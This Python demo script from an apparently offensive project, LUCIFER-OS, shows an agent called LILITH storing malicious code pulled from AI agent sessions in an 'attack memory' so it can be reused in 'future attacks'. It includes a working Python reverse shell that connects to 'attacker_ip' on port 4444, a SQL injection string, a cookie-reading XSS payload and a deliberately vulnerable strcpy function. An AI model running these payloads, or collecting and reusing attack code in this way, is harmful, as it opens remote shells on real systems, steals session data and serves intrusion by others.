#!/usr/bin/env python3
"""
Demonstration: Extract and Store Malicious Code from LUCIFER-OS Sessions
Shows how LILITH learns from generated attack code and stores it for future use
"""

import sys
import os
sys.path.append('/workspaces/LUCIFER-OS/tools')

from attack_memory import AttackMemory

def demonstrate_malicious_code_storage():
    """Demonstrate storing malicious code in LILITH's attack memory"""

    print("🔥 LUCIFER-OS: Extracting and Storing Malicious Code from Sessions")
    print("=" * 60)

    # Initialize attack memory
    memory = AttackMemory()

    # Example malicious code snippets that could be extracted from AI agent sessions
    malicious_snippets = [
        {
            "code_type": "reverse_shell",
            "target_type": "linux",
            "code_content": """import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("attacker_ip",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])""",
            "language": "python",
            "notes": "Basic reverse shell extracted from AI agent session"
        },
        {
            "code_type": "sql_injection",
            "target_type": "web_app",
            "code_content": """' OR '1'='1' --""",
            "language": "sql",
            "notes": "SQL injection payload generated by AI for testing"
        },
        {
            "code_type": "xss_payload",
            "target_type": "web_browser",
            "code_content": """<script>alert(document.cookie)</script>""",
            "language": "javascript",
            "notes": "XSS payload created during web vulnerability testing"
        },
        {
            "code_type": "buffer_overflow",
            "target_type": "c_binary",
            "code_content": """#include <string.h>
void vulnerable_function(char *input) {
    char buffer[64];
    strcpy(buffer, input); // Buffer overflow vulnerability
}""",
            "language": "c",
            "notes": "Buffer overflow exploit code from AI analysis"
        }
    ]

    print("📝 Storing extracted malicious code in LILITH's memory...")

    stored_ids = []
    for snippet in malicious_snippets:
        code_id = memory.store_generated_code(
            code_type=snippet["code_type"],
            target_type=snippet["target_type"],
            code_content=snippet["code_content"],
            language=snippet["language"],
            notes=snippet["notes"]
        )
        stored_ids.append(code_id)
        print(f"✅ Stored {snippet['code_type']} code (ID: {code_id})")

    print("\n🔍 Retrieving stored malicious code...")

    # Demonstrate retrieval
    for code_id in stored_ids:
        code_info = memory.get_best_code_for_target("reverse_shell", "linux")
        if code_info:
            print(f"\n📋 Retrieved code ID {code_id}:")
            print(f"   Type: {code_info[1]}")  # code_content
            print(f"   Language: {code_info[2]}")  # language
            break

    print("\n🎯 LILITH has successfully learned and stored malicious code!")
    print("   This code can now be reused in future attacks.")
    print("   The attack memory system ensures LILITH never forgets effective techniques.")

if __name__ == "__main__":
    demonstrate_malicious_code_storage()